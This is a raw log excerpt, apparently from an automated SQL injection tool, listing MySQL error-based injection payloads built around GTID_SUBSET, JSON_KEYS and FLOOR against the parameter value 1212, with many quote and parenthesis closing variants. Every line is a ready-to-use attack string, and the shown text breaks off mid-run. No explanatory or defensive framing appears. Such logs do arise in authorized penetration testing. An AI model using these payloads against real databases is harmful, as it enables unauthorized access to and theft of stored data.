[10:59:27] [PAYLOAD] 1212||(SELECT 0x62424d61 FROM DUAL WHERE 2344=2344 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||
[10:59:27] [PAYLOAD] 1212||(SELECT 0x726b6672 WHERE 2540=2540 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||
[10:59:27] [PAYLOAD] 1212+(SELECT OoAo WHERE 9474=9474 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))+
[10:59:27] [PAYLOAD] 1212+(SELECT 0x61766846 WHERE 9537=9537 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))+
[10:59:27] [PAYLOAD] 1212')) AS LdwG WHERE 6483=6483 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- cIjA
[10:59:27] [PAYLOAD] 1212")) AS rIwV WHERE 6337=6337 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- yLuP
[10:59:27] [PAYLOAD] 1212)) AS Lsyh WHERE 4515=4515 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- HWai
[10:59:28] [PAYLOAD] 1212') AS fTxt WHERE 2307=2307 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- WWPK
[10:59:28] [PAYLOAD] 1212") AS QYSy WHERE 6563=6563 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- gqMA
[10:59:28] [PAYLOAD] 1212) AS lhuX WHERE 9747=9747 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- aVNi
[10:59:28] [PAYLOAD] 1212` WHERE 5524=5524 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- xnRR
[10:59:28] [PAYLOAD] 1212`) WHERE 2149=2149 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- pXMe
[10:59:28] [PAYLOAD] 1212`=`1212` OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND `1212`=`1212
[10:59:28] [PAYLOAD] 1212"="1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND "1212"="1212
[10:59:28] [PAYLOAD] 1212]-(SELECT 0 WHERE 7667=7667 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))|[1212
[10:59:28] [PAYLOAD] 1212' IN BOOLEAN MODE) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)#
[10:59:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:59:28] [PAYLOAD] 1212) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- RgAt
[10:59:28] [PAYLOAD] 1212') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- wbkR
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- BITV
[10:59:28] [PAYLOAD] 1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- zgRe
[10:59:28] [PAYLOAD] 1212) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (7667=7667
[10:59:28] [PAYLOAD] 1212)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((8902=8902
[10:59:28] [PAYLOAD] 1212))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (((7893=7893
[10:59:28] [PAYLOAD] 1212 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))
[10:59:28] [PAYLOAD] 1212') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ('BFqp'='BFqp
[10:59:28] [PAYLOAD] 1212')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (('wgCu'='wgCu
[10:59:28] [PAYLOAD] 1212'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((('PpMp'='PpMp
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND 'dGSK'='dGSK
[10:59:28] [PAYLOAD] 1212') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ('CQAH' LIKE 'CQAH
[10:59:28] [PAYLOAD] 1212')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (('EKyh' LIKE 'EKyh
[10:59:28] [PAYLOAD] 1212'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((('ZIph' LIKE 'ZIph
[10:59:28] [PAYLOAD] 1212%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND 'Lyqs%'='Lyqs
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND 'QdNg' LIKE 'QdNg
[10:59:28] [PAYLOAD] 1212") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ("xicD"="xicD
[10:59:28] [PAYLOAD] 1212")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (("NdAC"="NdAC
[10:59:28] [PAYLOAD] 1212"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((("jgfg"="jgfg
[10:59:28] [PAYLOAD] 1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND "kVCP"="kVCP
[10:59:28] [PAYLOAD] 1212") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ("ehIw" LIKE "ehIw
[10:59:28] [PAYLOAD] 1212")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (("FwxT" LIKE "FwxT
[10:59:28] [PAYLOAD] 1212"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((("Wowa" LIKE "Wowa
[10:59:28] [PAYLOAD] 1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND "QIEs" LIKE "QIEs
[10:59:28] [PAYLOAD] 1212 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- mFyF
[10:59:28] [PAYLOAD] 1212 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))# pNYb
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) OR 'dnxG'='FdPK
[10:59:28] [PAYLOAD] 1212') WHERE 5301=5301 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- PyHA
[10:59:28] [PAYLOAD] 1212") WHERE 8693=8693 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- qNXO
[10:59:28] [PAYLOAD] 1212) WHERE 9366=9366 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- qAfR
[10:59:28] [PAYLOAD] 1212' WHERE 9211=9211 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- bqnF
[10:59:28] [PAYLOAD] 1212" WHERE 9146=9146 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- ZPIS
[10:59:28] [PAYLOAD] 1212 WHERE 1074=1074 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- XAwm
[10:59:28] [PAYLOAD] 1212'||(SELECT 0x7949515a WHERE 1760=1760 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||'
[10:59:28] [PAYLOAD] 1212'||(SELECT 0x756c4a59 FROM DUAL WHERE 9733=9733 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||'
[10:59:28] [PAYLOAD] 1212'+(SELECT 0x57516977 WHERE 3667=3667 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))+'
[10:59:28] [PAYLOAD] 1212||(SELECT 0x425a4552 FROM DUAL WHERE 5397=5397 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||
[10:59:28] [PAYLOAD] 1212||(SELECT 0x594e4a75 WHERE 4659=4659 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||
[10:59:28] [PAYLOAD] 1212+(SELECT YDRa WHERE 2275=2275 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))+
[10:59:28] [PAYLOAD] 1212+(SELECT 0x594b646e WHERE 1768=1768 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))+
[10:59:28] [PAYLOAD] 1212')) AS XzvU WHERE 6427=6427 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- sBmF
[10:59:28] [PAYLOAD] 1212")) AS gAcu WHERE 8538=8538 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- Cbnr
[10:59:29] [PAYLOAD] 1212)) AS FbbL WHERE 9440=9440 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- hLuC
[10:59:29] [PAYLOAD] 1212') AS Dwnv WHERE 5563=5563 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- vZFw
[10:59:29] [PAYLOAD] 1212") AS WebQ WHERE 7510=7510 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- cYQG
[10:59:29] [PAYLOAD] 1212) AS WuGL WHERE 8160=8160 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- bFlN
[10:59:29] [PAYLOAD] 1212` WHERE 3964=3964 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- XwdH
[10:59:29] [PAYLOAD] 1212`) WHERE 4633=4633 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- opxx
[10:59:29] [PAYLOAD] 1212`=`1212` AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND `1212`=`1212
[10:59:29] [PAYLOAD] 1212"="1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND "1212"="1212
[10:59:29] [PAYLOAD] 1212]-(SELECT 0 WHERE 9456=9456 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))|[1212
[10:59:29] [PAYLOAD] 1212' IN BOOLEAN MODE) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))#
[10:59:29] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:59:29] [PAYLOAD] 1212) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- PdAB
[10:59:29] [PAYLOAD] 1212') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- EmYc
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- tTUZ
[10:59:29] [PAYLOAD] 1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- erlS
[10:59:29] [PAYLOAD] 1212) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (9390=9390
[10:59:29] [PAYLOAD] 1212)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((8547=8547
[10:59:29] [PAYLOAD] 1212))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (((8925=8925
[10:59:29] [PAYLOAD] 1212 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))
[10:59:29] [PAYLOAD] 1212') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ('xtiu'='xtiu
[10:59:29] [PAYLOAD] 1212')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (('XzZJ'='XzZJ
[10:59:29] [PAYLOAD] 1212'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((('xAud'='xAud
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND 'PeIJ'='PeIJ
[10:59:29] [PAYLOAD] 1212') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ('ssEH' LIKE 'ssEH
[10:59:29] [PAYLOAD] 1212')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (('gxQF' LIKE 'gxQF
[10:59:29] [PAYLOAD] 1212'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((('pFbi' LIKE 'pFbi
[10:59:29] [PAYLOAD] 1212%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND 'uwzl%'='uwzl
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND 'JgLY' LIKE 'JgLY
[10:59:29] [PAYLOAD] 1212") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ("jCMf"="jCMf
[10:59:29] [PAYLOAD] 1212")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (("lNdU"="lNdU
[10:59:29] [PAYLOAD] 1212"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((("PdRm"="PdRm
[10:59:29] [PAYLOAD] 1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND "hXzs"="hXzs
[10:59:29] [PAYLOAD] 1212") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ("fnvM" LIKE "fnvM
[10:59:29] [PAYLOAD] 1212")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (("ELWD" LIKE "ELWD
[10:59:29] [PAYLOAD] 1212"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((("wEjD" LIKE "wEjD
[10:59:29] [PAYLOAD] 1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND "Iufc" LIKE "Iufc
[10:59:29] [PAYLOAD] 1212 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- HCyc
[10:59:29] [PAYLOAD] 1212 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))# ZHGn
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) OR 'rzQk'='Mozt
[10:59:29] [PAYLOAD] 1212') WHERE 5761=5761 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- bkbW
[10:59:29] [PAYLOAD] 1212") WHERE 4441=4441 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- mlOj
[10:59:29] [PAYLOAD] 1212) WHERE 8345=8345 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- JBYj
[10:59:29] [PAYLOAD] 1212' WHERE 3394=3394 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- YjAr
[10:59:29] [PAYLOAD] 1212" WHERE 4813=4813 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- pEmI
[10:59:29] [PAYLOAD] 1212 WHERE 1964=1964 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- tBqq
[10:59:29] [PAYLOAD] 1212'||(SELECT 0x664b6f76 WHERE 3994=3994 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||'
[10:59:29] [PAYLOAD] 1212'||(SELECT 0x70586a57 FROM DUAL WHERE 5267=5267 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||'
[10:59:29] [PAYLOAD] 1212'+(SELECT 0x44456761 WHERE 2725=2725 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))+'
[10:59:29] [PAYLOAD] 1212||(SELECT 0x4c527a6d FROM DUAL WHERE 4971=4971 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||
[10:59:29] [PAYLOAD] 1212||(SELECT 0x76526a6e WHERE 7681=7681 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||
[10:59:29] [PAYLOAD] 1212+(SELECT bYye WHERE 3460=3460 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))+
[10:59:29] [PAYLOAD] 1212+(SELECT 0x7549746f WHERE 5546=5546 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))+
[10:59:29] [PAYLOAD] 1212')) AS XzLz WHERE 3607=3607 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- jRUZ
[10:59:29] [PAYLOAD] 1212")) AS zrSg WHERE 6058=6058 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- wabH
[10:59:29] [PAYLOAD] 1212)) AS QNEl WHERE 7443=7443 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- ledn
[10:59:29] [PAYLOAD] 1212') AS ooii WHERE 4862=4862 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- IthY
[10:59:29] [PAYLOAD] 1212") AS kjtg WHERE 7394=7394 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- uNkA
[10:59:29] [PAYLOAD] 1212) AS pqdz WHERE 2205=2205 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- uCgw
[10:59:29] [PAYLOAD] 1212` WHERE 4514=4514 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- MZQV
[10:59:29] [PAYLOAD] 1212`) WHERE 3440=3440 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- yFCh
[10:59:29] [PAYLOAD] 1212`=`1212` OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND `1212`=`1212
[10:59:29] [PAYLOAD] 1212"="1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND "1212"="1212
[10:59:29] [PAYLOAD] 1212]-(SELECT 0 WHERE 7017=7017 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))|[1212
[10:59:29] [PAYLOAD] 1212' IN BOOLEAN MODE) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))#
[10:59:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:59:29] [PAYLOAD] 1212) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dipT
[10:59:29] [PAYLOAD] 1212') AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- diia
[10:59:29] [PAYLOAD] 1212' AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- cXom
[10:59:29] [PAYLOAD] 1212" AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jEiJ
[10:59:29] [PAYLOAD] 1212) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1456=1456
[10:59:29] [PAYLOAD] 1212)) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((4225=4225
[10:59:30] [PAYLOAD] 1212))) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (((3606=3606
[10:59:30] [PAYLOAD] 1212 AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[10:59:30] [PAYLOAD] 1212') AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('uZhu'='uZhu
[10:59:30] [PAYLOAD] 1212')) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('dTnx'='dTnx
